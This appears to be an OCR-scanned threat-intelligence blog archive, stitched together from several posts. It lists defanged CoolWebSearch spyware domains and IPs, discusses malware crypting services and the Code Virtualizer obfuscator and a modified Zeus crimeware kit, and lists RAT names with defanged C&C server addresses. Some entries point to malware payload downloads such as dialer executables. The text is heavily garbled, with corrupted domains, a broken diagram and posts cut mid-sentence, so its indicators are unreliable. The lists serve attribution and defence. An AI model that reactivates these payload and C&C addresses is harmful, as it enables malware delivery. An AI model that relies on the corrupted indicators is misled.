Dear blog readers, 


I’ve decided to share with everyone yet another batch of currently active rogue and malicious 
CoolWebSearch domains with the idea to assist everyone in their cyber attack attribution cam- 
paigns including cyber threat actor attribution campaigns[.] 


Sample currently active rogue and malicious CoolWebSearch domains portfolio: 
smartupdater[.]Jcom 
cash[.]pornocruto[.]nu 
pornocruto[.]nu 
ADASEARCH[.]COM 
ELITE-VIDEO-FEEDS[.]COM 
FUCKING-MACHINE[.]NET 
GREATDILDOS[.]COM 
TEEN-NUDE-PICTURE[.]COM 
BDSM-INC[.]COM 
BOYS-GROUP[.]COM 
BOYS-INC[.]COM 
COOL-PANTYHOSE[.]COM 
GAYS-CLUB[.]COM 
GAYS-INC[.]JCOM 
GET-GAY[.]COM 
HENTAI-INC[.JCOM 
ILLEGALAREA[.]COM 
ILLEGALDOMAIN[.]COM 
LESBIAN-INC[.]COM 

18905 


MATURE-INC[.]COM 
MATURES-CLUB[.]COM 
MY-SHEMALE[.]COM 
PANTYHOSE-INC[.]COM 
PANTYHOSE-NOW|.]COM 
PANTYHOSE-SITE[.]COM 
PANTYNOW[.]COM 
PICS-LAND[.]COM 
PICS-PLANETCOM 
PISSING-INC[.JCOM 
PISSING-SITE[.]COM 
PORNO-CENTER[.]COM 
PORNO-INC[.JCOM 
REAL-PISSING[.]COM 
SUPER-GAYS[.]COM 
TEEN-NOW[.]COM 
TEENS-CASTLE[.]COM 
TEENS-GROUP[.]COM 
THE-ANIME[.]COM 
THE-BDSM[.]COM 
THE-HENTAI[.]COM 
THE-PANTY[.]COM 
THE-PISSING[.]COM 
THE-THUMBS[.]COM 
THE-TRANNY[.]COM 
THE-UPSKIRT[.]COM 
THUMBS-INC[.]COM 
THUMBS-LAND[.]COM 
THUMBSWEB[.]COM 
UPSKIRT-INC[.]COM 
VOYEUR-GROUP[.]COM 
VOYEUR-INC[.]COM 
X-PANTY[.]COM 
X-PISSING[.]COM 
X-TRANNY[.]COM 
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X-UPSKIRT[.]COM 
XXX-PISSING[.]JCOM 
YOUR-GAY[.]COM 
YOURLESBIAN[.]JCOM 
YOURSHEMALE[.]COM 
topsearch10[.]com 
lickitquick[.]com 
AETEST[.]JINFO 
coolmature[.]net 
BONBON[.]NET 
HOTPOP[.]COM 
PHREAKER[.]NE 
PUNKASS[.]COM 
SEXMAGNET[.]COM 
TOUGHGUY[.]NET 
OO0O0info[.]Jcom 
008i[.]com 
0-29[.]Jcom 
0-2u[.]Jcom 
0-days[.]net 
609[.]Jcom 
75tz[.Jcom 
8ad[.Jcom 
ad25[.]com 
ad45[.]Jcom 
ad77[.]com 
ad86[.]com 
get-access[.]Jcom 
get-certified[.]net 
get-datal[.]net 
get-faster[.]Jcom 
go-acct[.]Jcom 
go-advertising[.]com 
go-all[.]Jcom 


icansearch[.]net 
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find-itnow[.]Jcom 
just[.]find-itnow[.]Jcom 
smarttrade[.]Jallyes[.]com 
mtreexxx nl 
host2010[.]com 
ssl4all[.Jcom 
OUTHOST[.]JINFO 
SMARTDNS[.]ORG 
Browse[.]ifriends[.]net 
wwwfinder[.]net 
connect[.]online-dialer[.]com 
installs rdgUS1115[.]Jexe 
online-dialer[.]Jcom 
searchfind[.]info 
63[.]246[.]131[.]19 
damcash[.]com 
gate[.]damcash[.]com 
smartpops[.]Jcom 
bdsm-dialer[.Jcom 
eliteshells[.Jnet 
umaxlogin[.]com 
hightcalldialer[.Jcom 
umaxsearch[.]com 
iefeadsl[.]com 
RF104[.]COM 
AMATEURFORALL[.]COM 
searchmeup[.]com 
searchfind[.]Jcom 
64[.]127[.]104[.]144 
wegcash[.]com 
free[.]wegcash[.]com 
findwhatevernow[.]com 
sweatysmut[.]com 
softwareoutfit[.]com 
mp3u[.]com 
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locator[.]imagesrvr[.]com 
download[.]centralserver[.]net 
alhimik[.Jcom 
greg-search[.]com 
popuptoast[.]Jcom 
CHINAEXPRESSJIDLA[.]COM 
userlands[.]Jcom 
adult-profit[.]Jcom 
clickzs[.]com 
cz6[.]clickzs[.]Jcom 
cz7[.]clickzs[.]Jcom 
vip[.]clickzs[.]Jcom 
thumberland[.]Jcom 
xxx-goto[.]net 
therealsearch[.]Jcom 
CASH4TOOLBAR[.]COM 
MSUPDATER[.]COM 
MSUPDATER[.]NET 
MSUPDATER[.JORG 
searchmiracle[.]Jcom 
SEARCHMYREQUEST[.]COM 
adamsupportgroup[.]lorg 
tonsporn[.]com 
webcounter[.]cc 
gallerytaboo[.]com 
wofldsex[.]com 
showebway[.]com 
erolux[.]Jcom 
little-lady[.]net 
axistek[.]com 
free32[.]com 
thoughtconvergence[.]com 
interneteraser[.]com 
maxcash[.]COM 


maximumcashf[.]com 
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adultprovide[.Jcom 

nastydollars[.]Jcom 

updates[. Jadultprovide[.Jcom 

clicks[. ]nastydollars[.]Jcom 

inthevip[.]Jcom 

mikesapartment[.]com 

welivetogether[.]com 

gxb[.]nastydollars[.]Jcom 

mailwiper[.]Jcom 

ptssa[.]net 

123-search[.]net 
353-fjusj-fd5mfjw-jw-8463287-8gjd878-7x-O0qq0[.]Jcom 
4545kj-dfdf4-586hkc53-215864jjf-n6myOw14a8[.]Jcom 
75ghs987|mciqogn0387jfmshs73m398e84n438dn3[.]com 
867ktnshb-5309-ht047nbut0-48jtmdsl-7200jrtnids[.]Jcom 
click2medial[.]net 

media-search[.]net 

scourweb[. ]net 

search[.]search-exe[.]com 

search-assist[.]net 

searchduckie[.]net 

searchenhancement[.]com 

search-exe[.]com 

searchnetworks[.]net 

sidebarsearch[.]Jcom 

windowenhancer[.]com 

thesexmaill.Jcom 

joeghunter[.]com 

xXxx3x[.]Jcom 

lovely-mature[.]Jcom 
galleries[.]thematurehardcore[.]com 
xxxmovielinks[.]net 

offendale[.]com 

karupspc[.]Jcom 

home[.]adultcash[.]com 
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ads[.]Jadultcash[.]Jcom 
adultcash[.]com 
yellow500[.]Jcom 
hqstorm[.]com 
name15[.]com 
w3matter[.]com 


hot-search[.]Jcom 


usO1[.]xmlsearch[.]findwhat[.]Jcom 


spydeleter[.]Jcom 
66[.]150[.]55[.]135/sk/s/1/ 
secret-keeper[.]com 
freeezinebucks[.]com 
e-finder[.]cc 
fast-look[.]Jcom 
partypoker[.]Jcom 
allaboutsearching[.]com 
ISEARCHHERE[.]COM 
IWANTOSEARCH[.]COM 
MYSEARCHNOW|[.]COM 
SEARCHWEB2[.]COM 
SEARCHWEBNOW[.]COM 
netsearchsoft[.Jcom 
Ohyea[.]org 
OMEGASEARCH[.]COM 
OPENSEARCH[.JORG 
PROSEARCHING[.]JCOM 
search-aide[.]com 
simplyvids[.]Jcom 
isprime[.]Jcom 
firstbookmark[.]com 
dialerplatform[.]Jcom 
GLOBAL-ACCES[.]COM[.] 
GLOBAL-ACCESS[.]COM 
trafficjuicer[.]com 
66[.]230[.]145[.]49/gt[.]htm| 
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redpersonals[.]Jcom 
xxxgateway[.]Jcom 
pictureheaven[.]com 
pornoverview[.]com 
66[.]230[.]164[.]180/jsclick[.]php 
66[.]230[.]164[.]182/click[.]php 
lookfindgo[.]com 
PASSIONGALLERIES[.]COM 
searchgalleries[.]com 
sesupport[.]com 

ruworld[.]com 
marketbanker[.]com 
snakevideos[.]com 
66[.]230[.]172[.]112/click[.]php 
66[.]230[.]172[.]113[.]click[.]php 
66[.]230[.]172[.]115/click[.]php 
dlO[.]netreplicator[.]Jcom 
netreplicator[.]Jcom 
netcathost[.]Jcom 
66[.]250[.]130[.]194/mail[.Jhtm 
allcrazyporn[.Jcom 
spyorgy[.]net 

thestas[.]Jcom 
approvedlinks[.]com 
tooncomics[.]com 
mostsexygirls[.]Jcom 
inettraffic[.Jcom 
inet-traffic[.]Jcom 
searchit[.]Jcom 
FreeHomePages[.]Com 
banner2[. linet-traffic[.]Jcom 
delivery[.]Jinet-traffic[.]Jcom 
defaultsearching[.]Jcom 
search-and-go[.]com 
Coolwebsearch[.]com 
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sd O(r1), £4 
ld Te, a 


fag, ri, #8 
bnez ri, 1#3 


Imaginary CPU#1 


— el 
7} ld 
mov eax, ebx fee, % 
call tmpl 
push eax => => a = 
| add ecx, eax coda 4S 
Virtualizer ws 
— s\ Imaginary CPU#10 
Original Code ; a : 
(x86 CPU) Code Virtualization 


Imaginary CPU#n 


[1]Commoditization or commercialization, Themida or Code Virtualizer, individually crypting 
or outsourcing to an experienced malware crypting service offering discounts on a volume 
basis next to detection rates of the crypted binary offered by a trusted online scanner that is 
NOT distributing the samples to the vendors? These are just some of the questions malware 
authors often ask themselves, while others distribute pirated copies of Code Virtualizer urging 
everyone to start taking advantage of commercial anti-reverse engineering tools to make their 
malware harder to analyze. Once again, just like we’ve seen before, a legitimate commercial 
application can come handy in the hands of the wrong people : 


"Code Virtualizer will convert your original code (Intel x86 instructions) into Virtual Op- 
codes that will only be understood by an internal Virtual Machine. Those Virtual Opcodes and 
the Virtual Machine itself are unique for every protected application, avoiding a general attack 
over Code Virtualizer. Code Virtualizer can protect your sensitive code areas in any x32 and 
x64 native PE files (like executable files/EXEs, system services, DLLs , OCXs , ActiveX controls, 
screen savers and device drivers). 
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maximumhost[.]com 
russiankiss[.]Jcom 
ROSEXXXGARDEN[.]COM 
iweb-commerce[.]com 
barelylegalsite[.]Jcom 
coolamateursite[.]com 
coolanalsite[.]com 
coolasiansite[.]Jcom 
coolfetishsite[.]com 
coolfreehost[.]Jcom 
coolgaysite[.]Jcom 
coolhardcoresite[.]Jcom 
cooloralsite[.]com 
coolpaysite[.]Jcom 
dirtyhosting[.]com 
freecoolhost[.]Jcom 
freehost4you[.]com 
freshlesbiansite[.]com 
freshteensite[.]Jcom 
hotfreehosting[.]Jcom 
maximumhosting[.]com 
freefresh[.]dirtyhosting[.Jcom 
freemoney[. ]dirtyhosting[.]com 
bdsmbedroom[.]com 
cicamacal[.]Jcom 
dirtycelebs[.]Jcom 
indosaru[.]com 
pojoksex[.]com 
razvrat[.]net 
sikici[.]com 
unoerotica[.]Jcom 
use-your-brain[.]com 
xxxasiansites[.]Jcom 
hotfreebies[.]Jcom 


coolfreepage[.]com 


18913 


coolfreepages[.]com 
curvedspaces[.]com 
ionichost[.]com 
iwebland[.]com 
ww2[.]Jiwebland[.]com 
xc4val[.Jiwebland[.]Jcom 
jonas[.]coolfreepages[.]Jcom 
starwars[.]coolfreepages[.]com 
galleries[.]mpegstation[.]com 
mpegstation[.]Jcom 
700k[.]Jcom 
movierevenue[.]com 
dedmazail[.]com 
99livecam[.]com 
porn-mix[.Jcom 
toprefsys[.]Jcom 
minisearch[.]startnow[.]com 
startnow[.]com 
galleries[.Jallinternal[.Jcom 
xxxdirtylist[.]com 
66[.]55[.]136[.]82[.]gigabits[.Jus 
cx[. Jlinklist[. Joc 

linklist[.]Jcc 
N3[.]searchx[.]cc[.] 
th[.Jmsie[.]cc 

Ocalories[.]net 
1-domains-registrations[.]com 
crazyfinder[.]com 
looksa[.]com 

tunders[.]com 
turbofind[.Jcom 
scumware-remover[.]org 
h-c-t[.]Jcom 
smartestsearch[.]com 
66[.]79[.]183[.]140 
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do-jaja[.]Jcom 
allcybersearch[.]com 
hotpopup[.]com 
hotsearchbox[.]com 
I-SEARCH[.]COM 
jethomepage[.]Jcom 
jetseeker[.]Jcom 
searchxl[.]Jcom 
tinybar[.]Jcom 
topsearcher[.]com 
znext[.]Jcom 
adult-empire[.]com 
anathema[.]biz 
boysporn[.]net 
directsin[.]net 
freehostempire[.]net 
momboyporn[.]com 


pretty-teens[.]info 


russian-amateur-porn[.]com 


sex-here[. ]biz[.] 
sex-network[.]info 


ww-foto[. ]info 


66[.]98[.]194[.189/adrevenue/index[.]php 


greenmoney|.]biz 
itmarkservers[.]Jcom 
qualityswap[.]Jcom 
showhitcounter[.]com 
showyour[.]info 
viagrasildenafil[.]Jcom 
cyprusturk[.]net 
search-casino[.]Jcom 
directsearch[.]net 
mega[.]directsearch[.]net 
mymaydayinc[.]Jcom 


ne-ebu[.]Jcom 
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netsearch[.]Jcom 
hotsearchbar[.]com 
67[.]18[.]129[.]75/connect[.]cgi?id=1351 
vischmarkt[.]org 
aboutclicker[.]Jcom 
amicodiieri[.]it 
sex-or-sex[.]Jcom 
67[.]19[.]51[.]10/enter/access2[.]asp/is/seksdialer[.]exe 
67[.]19[.]51[.]4/content 
handicaphelp[. ]cz 
clean-hosted-galleries[.]Jcom 
theincest[.]com 
69[.]20[.]62[.]53/yyy5[.]html 
squirtitinme[.]Jcom 
virginz[.]info 
trygames[.]com 
deardrocher[.]com 
seek2[.]com 
mypoiskovik[.]Jcom 
69[.]31[.]79[.]100/winsearchie32[.]chm/winsearchie32[. Jexe 
pizdato[.]biz 
CUTEGIRLSPORN[.]COM 
devilsfuck[.]Jcom 
HARDCOREOVER[.]COM 
NATIVEBLACKPORNO[.]COM 
tvé6tut[. info 

solongas[.]com 
here4search[.]com 
NATIVEHARDCORE[.]COM 
mature-sex-live[.]com 
gotosex4all[.]com 
mig29here[.]com 
webanalsex[.]com 
cc20foreva[.]Jcom 
t34rulit[.]com 
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69[.]31[.]85[.]151/G7/ 
GREG-TUT[.]JCOM 
teenpyramid[.]com 
kitasearch[.]com 
windowws[.]cc 
yourbookmarks[.]info 
datasearch[.]info 
69[.]31[.]86[.]221/se[.]php 


69[.]31[.]86[.]221/xltmk[.]dat 


adult-friends-finder[.]net 
coolsearcher[.]info 
coolwebsearch[. info 
coolwebsearch[.]Jorg 
domainname4you[.]com 
fukingmachines[. Jinfo 
girls-porn-life[.Jcom 
hogtied[.]info 
machinesboys[.]Jcom 
manufacturingporn[.]com 
meninpain[. ]biz 
nevest[.]net 
onlyfuck[.]Jcom 
pavlovbooks[.]com 
peniscontent[.]Jcom 
pereulok[.]net 
pornfree[.]info 
pornosaity[.]com 
pornpic[.]org 
pornsecretaries[.]biz 
prague-porn[.]biz 
prague-sex[.]com 
put-your-link-here[.]Jcom 
rape-cool-video[.]com 
sebastacz[.]Jcom 


sexbanan[.]com 
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sex-prague[.]com 
sex-tgpl[.]Jinfo 
shopknights[.]com 
waterbondage[.]biz 
zaseyan[.]com 
AMATEUR-VOYEUR[.]BIZ 
BEST-RESULT[. JINFO 
BEST-SEARCH[.]INFO 
BIGPORNMOVIES[. ]BIZ 
EASY-DOLLARS[.]COM 
NEO-TOOLBAR[.]COM 
PORNMPG[.]BIZ 
SEARCHBAR[.]INFO 
SEARCH-SMART[.]INFO 
hostssp[.]com 
www666[.]hostssp[.]Jcom 
about-blank[. ]biz 
O5p[.]Jcom 
easy-gals[.]net 
gals-post[.]com 
galsteam[.]Jcom 
galsteen[.]Jcom 
7days[.]ws 
onlysex[.]ws 
xsex[.]ws 
fullmovies[.]net 
allinternal[.Jcom 
dialer2004[.]com 
spidersearch[.]com 
d[.]dialer2004[.]com 
eentinc[.]Jcom 
zlookup[.]biz 
ad1[.]zendmedial.]Jcom 
zendmedial[.]com 

calls chm exploit 
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ns1[.]play-with-girls[.]com 
fastsearchweb[.]com 
FINDSPYWARE[. ]NET 
MSNAGENT[.JCOM 
ns2[.]play-with-girls[.]com 
SEARCH-SOFT[.]NET 
v5msn[.]Jcom 
historyoff[.]com 
popclose[.]Jcom 
wareout[.]com 
adultgambling[.]net 
adultxxxgames[.]net 
easywebdating[.]net 
girlsforgambling[.]com 
girlsforgambling[.]net 
girlsforgames[.]Jcom 
hostanddomain[.]net 
insurancedeall[. ]net 
livepokeroom[.]com 
livepokeroom[.]net 
money-athome[.]net 
personal-photo[.]net 
playwithchicks[.]Jcom 
playwithchicks[.]net 
play-with-girls[.]Jcom 
pokerwithgirls[.]net 
sexandpoker[.]com 
sexandpoker[.]net 
trustedpharmacy[.]net 
vipgambling[.]net 
ADOAWNLOADT[. BIZ 
newiframe[. ]biz 
sp2fucked[. ]biz 
deaFR176[.]exe 


easy-search[.]biz 
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royalsearch[.]net 
69[.]50[.]170[.]212/connect[.]cgi 
easy-search|[.]net 
gkn[.]directwebsearch[.]net 
Owebsearch[.]Jcom 
all-websearch[.]Jcom 
CONYC[.JCOM 
HOT-DAILY-PICS[.]COM[.] 
NUDE-TEENS-BODIES[.]COM 
ONLYGOODSEARCH[.]COM 
SEARCHPORTAL[. JINFO 
gosurfy[.]Jcom 
600pics[.Jcom 
dorkodrom[.]Jcom 
find4uL[.]net 
getthis4free[.]com 
hbison[.]com 
web-cams-chat[.]com 
69[.]50[.]184[.]54/find4u/ 
rootsearch[. ]biz 
find-online[.]net 
moreporn[. ]biz 
coolsearch[.]biz 
vse-moe[.]biz 
vv3[.]s1[.]topx[.]cc 
buldog-search[.]com 
BULDOG-STATS[.]COM 
CREAMEDPUSSY[.]NET 
jetsearch[.]Jorg 
82[.]179[.]166[.]145 
cannotfind[.]net 
ez-finder[.]Jcom 
yeahsearch[.]net 
iwantsearch[.]com 
searchservices[.]info 
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autosearch[. ]cc 
BestSearch[.]cc 
xpehban][.]biz 
adultden[.]com 
maxxxhosters[.]com 
SPYKILLERPRO[.]COM 
acoolwebsearch[.]Jcom 
public[.]windupdates[.]Jcom 
downloads[. ]default-homepage-network[.]com 
COOLNAMESERV[.]COM 
enjoysearch[.]info 
dmporn[.]Jcom 
PROLIVATION[.]JCOM 
SEXYQUE[.JCOM 
fromru[.]Jcom 
mail333[.]Jcom 
pisem[.]net 
looking-for[.]cc 
Calls search-about[.]net 
ns1[.]realsearch[.]ws 
ns2[.]realsearch[.]ws 
bigbr[.]cc 
happy-new-year[.]biz 
PERFECT-SEARCH[.]INFO 
SEARCHALL[. JINFO 
SMART-FINDER 
START-PAGE[. ]JINFO 
SUPER-FINDER[.]INFO 
SURFAST[. JINFO 
YOBTA[.]JINFO 
YOPTA[.JINFO 
nkvd[.]us 
81[.]211[.]105[.]37/20605 
81[.]211[.]105[.]37/551 
your-search[.]cc 
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search-biz[.]cc 
searchcentrall[.]cc 
get-search[.]cc 
best-search[.]cc 
buysearch[.]cc 
search-web[.]cc 
home-search[.]cc 
hot-searches[.]com 
lender-search[.]com 
searchx[.]cc 
seek-all[.]Jcom 
yoursearch247[.]Jcom 
lookingfor[.]cc 
riviera[.]cc 
search-town[. ]net 
lookfor[.]cc 
searchv[.]Jcom 
hugesearch[.]net 
4-counter[.]com 
crue[.]global-counter[.]com 
dia[.]4-counter[.]Jcom 
gigafinder[.]com 
global-counter[.]com 
icanfindit[.]net 
tonser[.]4-counter[.]Jcom 
e-sexcash[.]com 
0190-dialer[.Jcom 
crackz-serialz[.]Jcom 
mp3search[.]ws 
inhost2[.]info 
loliboard[.]Jinhost2[.]info 
loliz[.Jinhost2[.]info 
81[.]9[.]3[.]77/click[.]php 
countere[.]com 
pukkasearch[.]net 
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~ Code Virtualizer v1.3.4.0 | Project: C:\Users\rahucha\Documents\Virtualizer Projects\64-bit Test.cv = D4 


code 


Total Obfuscation against Reverse Engineering 
firtualizer | 1 %sctons: at etl 


. * 
Ne ~~ ] Qpen... =F] 8 pmet Save As... =) Protect Help J.) About... 


Code Virtualizer can generate multiple types of virtual machines with a different instruction 
set for each one. This means that a specific block of Intel x86 instructions can be converted 
into different instruction set for each machine, preventing an attacker from recognizing any 
generated virtual opcode after the transformation from x86 instructions. The following picture 
represents how a block of Intel x86 instructions is converted into different kinds of virtual 
opcodes, which could be emulated by different virtual machines. 


When an attacker tries to decompile a block of code that was protected by Code Virtual- 
izer, he will not find the original x86 instructions. Instead, he will find a completely new 
instruction set which is not recognized by him or any other special decompiler. This will force 
the attacker to go through the extremely hard work of identifying how each opcode is executed 
and how the specific virtual machine works for each protected application. Code Virtualizer 
totally obfuscates the execution of the virtual opcodes and the study of each unique virtual 
machine in order to prevent someone from studying how the virtual opcodes are executed." 


With Cyber-as-a-Service business model becoming increasingly common, the entire [2]quality 
assurance model in respect to malware is slowly maturing from individual malware crypting 
propositions, where the seller of the service is basically taking advantage of a diverse set 
of public/private tools, into DIY web services offering crypting discounts on a volume basis, 
and perhaps most importantly - improving the customer’s experience by letting him take 
advantage of the inventory of crypting tools and bypassing verification services. Within the 
tool’s inventory are naturally lots of (pirated) commercial anti-reverse engineering tools. 
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As we’ve seen before, whenever someone starts commercializing what used to be a Self- 
selving process, others will either follow, or disintermediate their services by persistently 
releasing crypting tools for free in the wild. At the end of the day, it’s all a matter of how 
serious they’re about commercializing this market segment, and taking into consideration 
that a spamming vendor is offering malware crypting services "in between" the rest of the 
services in their portfolio, this underground cash cow is yet to prove itself in the long term. 


1. http: //ddanchev. blogspot .com/2008/09/commoditization-of-anti-debugging. htm 


2. http: //ddanchev. blogspot .com/2007/10/multiple-firewalls-bypassing. html 


4.9.15 Modified Zeus Crimeware Kit Comes With Built-in MP3 Player (2008-09-29 23:38) 
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Modified versions of popular [l]open source crimeware kits rarely make the headlines due 
to the fact that anyone can hijack a crimeware kit’s brand, build and [2]innovate using its 
foundations, and claim it’s a new version [3]released by the original authors. That’s of course 
in between the tiny time frame until he’s exposed as the fake author of Zeus that may have 
in fact came up with a unique feature that the original authors didn’t include. 


This [4]modified version of Zeus is yet another example of how [5]cybercriminals are ac- 
tively modifying crimeware kits, literally making such practices as keeping version numbers 
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18.1.29 A Peek Inside Today’s Modern RATs (Remote Access Tools) and Trojan Horses 
C&C (Command and Control) Communication Channels - An OSINT Analysis 
(2022-01-28 14:13) 


[1] 
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Dear blog readers, 


I’ve decided to share with everyone a currently active portfolio of RATS (Remote Access Tools) 
and trojan horses C &C (Command and Control) communication channels including actual cur- 
rently active names of RATs (Remote Access Tools) and trojan horses wit the idea to assist 
everyone in their cyber attack and cyber attribution campaigns where the C &C (Command 
and Control) communications channels which I'll share exclusive rely and use static and dy- 
namic DNS and IP providers for the actual C &C infrastructure which is a common TTP (Tactics 
Techniques and Procedures) for this type of malicious software releases. 


Sample RATs (Remote Access Tools) and trojan horses names currently in circulation in 2021 
include: 


Casa RAT 
Back Orifice 
Bandook RAT 
Dark Comet Rat 
Cerberus 
Cybergate 
Blackshades 
Poison Ivy 
Schwarze Sonne RAT 
Syndrome RAT 
Team Viewer 
Y3k RAT 
13Snoopy 
5pO0f3r[.]N $ RAT 
NetBus 
SpyNet 
[.]P[.] Storrie RAT 
Turkojan Gold 
Bifrost 
Lost Door 
[.]Beast 
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Shark 

Sub7 

Pain RAT 

xHacker Pro RAT 

Seed RAT 

Optix Pro RAT 

Dark Moon 

NetDevil 

Deeper RAT 

MiniMo RAT 

Alusinus RAT vO[.]8 
Alusinus RAT vO[.]9 
Babylon 1[.]5[.]1[.]O 
Babylon 1[.]6[.]O[.]O 

Back Connect Rat O[.]5[.]0 
Bozok 1[.]4[.]3 

Bozok 1[.]5[.]1 

BX RAT v1[.]0 

Cloud Net RAT 

Comet RAT vO[.]1[.]4 
Coringa-RAT vO[.]1 
Crimson 3[.]O[.]O 

Crimson RAT 2[.]2[.]6 
ctOs 1[.]3[.]O[.]0 
CyberGate Excel v2[.]5[.]2[.]0 - Trial 
CyberGate Excel v2[.]5[.]5[.]1 - Trial 
CyberGate v1[.]01[.]12 
CyberGate v1[.]03[.]O 
CyberGate v1[.]07[.]5 
CyberGate v3[.]4[.]2[.]2 Cracked 
Dark Comet 4[.]0 

Dark Comet 5[.]1 

Dark Comet 5[.]3 
DarkComet Legacy 
DarkCometRAT52-2F 
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DarkCometRAT53 
DarkCometRAT531 

DH Rat O[.]3 

D-RAT 

Frutas RAT vO[.]9 
Greame RAT v1[.]6 
Greame RAT v1[.]9 
HAKOPS RAT v2 
Imminent Monitor 2[.]O 
Imminent Monitor 3[.]9[.]JO[.]0 
Imperium RAT Cracked 
jRat 

jSpy 

jSpy RAT vO[.]09 

jSpy RAT vO[.]31 Cracked 
KilerRat V 10[.]O[.]0 
L6-RAT Beta 

Maus 2[.]0b 

Mega RAT 1[.]5 Beta 
MLRAT + Source 

MQ5 RAT 

NanoCore 1[.]2[.]2[.]0 
NingaliNET v1[.J1[.JO[.]JO 
NjRAT O[.]7 

njRAT vO[.]8d By Nasser2012 
njworm 

NovaLite v3[.]0 

Nuclear RAT 2[.]1[.]0 
Orion RAT O[.]9 Free 
Pandora RAT V1[.]1 
Paradox RAT 

Proton 1[.]1[.]O[.16 
pupy-master 

Poison Ivy 


Quasar 1[.]1 + Source 
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QuasarRAT v1[.]3[.JO[.]O 
Rabbit-Hole Autoit RAT v1[.]O Beta 2 
Revenge RAT vO[.]1 
Revenge RAT vO[.]2 
Revenge RAT vO[.]3 
SkyWyder 2[.]2 
Spycronic 1[.]O2[.]1 
Spygate 2[.]6 
SpyGate-RAT 2[.]9 
SpyGate-RAT 3[.]1 
SpyGate-RAT 3[.]2 
SpyGate-RAT 3[.]3 
SpyNet O[.]7 Public 
Spy-Net v2[.]6 
Sub-7 O[.]10 
Turkojan 4[.]O Gold 
ucuL v1[.]1 

Vantom RAT 

Virus Rat v8[.]O Beta 
Xena Rat 2[.]O 

XRAT 2[.]O 


Sample RATs (Remote Access Tools) and trojan horses known C &C (Command and Control) 
communication server channels include: 


hxxp://O009boot[.]ddns[.]net/ 
hxxp://104[.]144[.]198[.]115/ 
hxxp://105[.]105[.]104[.]198/ 
hxxp://105[.]105[.]173[.]58/ 
hxxp://105[.]105[.]185[.]105/ 
hxxp://109[.]201[.]189[.]13/ 
hxxp://111[.J221[.]29[.]254/ 
hxxp://115[.]126[.]219[.]31/ 
hxxp://118[.]26[.]141[.]209/ 
hxxp://118[.]26[.]141[.]210/ 
hxxp://122[.]46[.]15[.]164/ 
hxxp://123unk123[.]ddns[.]net/ 
hxxp://13[.]124[.]168[.174/ 
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hxxp://130[.]25[.]242[.]66/ 


hxxp://133katelinn[.]hopto[.Jorg/ 


hxxp://138[.]130[.]206[.]150/ 
hxxp://139[.]162[.]175[.]167/ 
hxxp://141[.]255[.]159[.13/ 
hxxp://149[.]129[.]133[.]195/ 
hxxp://149[.]3[.]143[.]104/ 
hxxp://151[.]101[.]2[.]110/ 
hxxp://160[.]202[.]163[.]243/ 
hxxp://167[.]108[.]52[.]154/ 
hxxp://167[.]116[.]22[.]242/ 
hxxp://167[.]116[.]32[.]152/ 
hxxp://167[.]116[.]48[.]151/ 
hxxp://167[.]99[.J251[.]51/ 
hxxp://177[.]130[.]49[.]118/ 
hxxp://178[.]54[.]139[.]105/ 
hxxp://179[.]125[.]62[.]162/ 
hxxp://179[.J221[.]42[.]45/ 
hxxp://18[.]218[.]228[.]132/ 
hxxp://180[.]68[.]114[.]205/ 
hxxp://181[.]214[.]55[.]23/ 
hxxp://181[.]46[.]172[.]191/ 
hxxp://181[.]52[.]105[.]187/ 
hxxp://185[.]125[.]205[.]81/ 
hxxp://185[.]125[.]205[.]91/ 
hxxp://185[.]148[.]241[.]58/ 
hxxp://185[.]208[.]211[.]235/ 
hxxp://185[.]209[.]85[.]74/ 
hxxp://185[.]254[.]183[.]115/ 
hxxp://185[.]31[.]161[.]186/ 
hxxp://185[.]56[.]90[.177/ 
hxxp://185[.]81[.J157[.]24/ 
hxxp://185[.]82[.J216[.]57/ 
hxxp://185[.]84[.]181[.]89/ 
hxxp://186[.]118[.]110[.]209/ 
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hxxp://186[.]118[.]111[.]142/ 
hxxp://188[.]165[.]224[.]26/ 
hxxp://188[.]2[.]137[.]168/ 
hxxp://188[.]54[.]182[.]240/ 
hxxp://188[.]54[.]184[.136/ 
hxxp://188[.]66[.]7[.]124/ 
hxxp://188[.]72[.]104[.164/ 
hxxp://188[.]83[.]129[.]33/ 
hxxp://189[.]47[.]113[.]180/ 
hxxp://189[.]47[.]114[.]215/ 
hxxp://191[.]101[.]22[.]196/ 
hxxp://192[.]169[.]69[.]25/ 
hxxp://194[.]182[.]73[.]173/ 
hxxp://194[.]5[.]98[.]56/ 
hxxp://197[.]207[.]219[.]206/ 
hxxp://2[.]20[.]242[.]8/ 
hxxp://2[.]21[.]242[.]237/ 
hxxp://201[.]208[.]105[.]81/ 
hxxp://202[.]195[.]210[.]218/ 
hxxp://204[.]44[.]78[.]113/ 
hxxp://211[.]108[.J133[.]241/ 
hxxp://211[.]44[.]166[.]16/ 
hxxp://212[.]129[.]42[.]206/ 
hxxp://212[.]133[.]210[.]232/ 
hxxp://212[.]47[.1247[.176/ 
hxxp://212[.]7[.]208[.]105/ 
hxxp://212[.]83[.]170[.]126/ 
hxxp://213[.]183[.]58[.]139/ 
hxxp://213[.]208[.]129[.]200/ 
hxxp://217[.]103[.]124[.]136/ 
hxxp://218[.]204[.]141[.]228/ 
hxxp://220[.]124[.]23[.]84/ 
hxxp://23[.]105[.]131[.]162/ 
hxxp://25[.]66[.]198[.]77/ 
hxxp://34[.]211[.]181[.]161/ 
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irrelevant. While the administrator is managing his botnet, he can load local, or tunein the 
built-in online radio stations the author of this modification included, next to changing Zeus 
entire graphical layout. 
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Floron Beero: 16 / Barépaveae aata: 16 Cewears bee seen Orepapets pce nore Ma ME 


Let’s take into consideration another example, the infamous Pinch DIY malware builder, that’s 
been around for over 4 years. With [6]the populist arrest of its authors in 2007, cybercriminals 
are still innovating on the foundations offered by Pinch, and [7]thanks to its publicly obtainable 
source code. It’s also worth pointing out that these two Zeus and Pinch modifications are 
courtesy of a single individual, that in between modifications of popular crimeware kits, seems 
to be busy porting different modules on different malware kits and web based malware, 
knowingly or unknowingly contributing to the convergence of spamming, DDoS, web based 
malware, and botnet management kits. 


From a sarcastic perspective - what’s next? Perhaps a built-in slideshow of random screen- 
shots taken from malware infected desktops in the botnet, or even a pink layout modification 
for female botnet masters. Customerization, and [8]customer tailored services can make 
anything happen, and naturally enjoy the higher profit margins. 


1, [ep each og upot,con/ 2008 06] erinuware Eis walnarania-to Ra 
2. http://ddanchev.blogspot .com/2007/09/custom-ddos-capabilities-within-malware.htm 
3, ftp //adenchey bLopepot coa/2006/06/euten- accu at tacks witain popular tel 

4. http: //ddanchev. blogspot . com/2008/04/crimeware-in-middle-zeus. html 

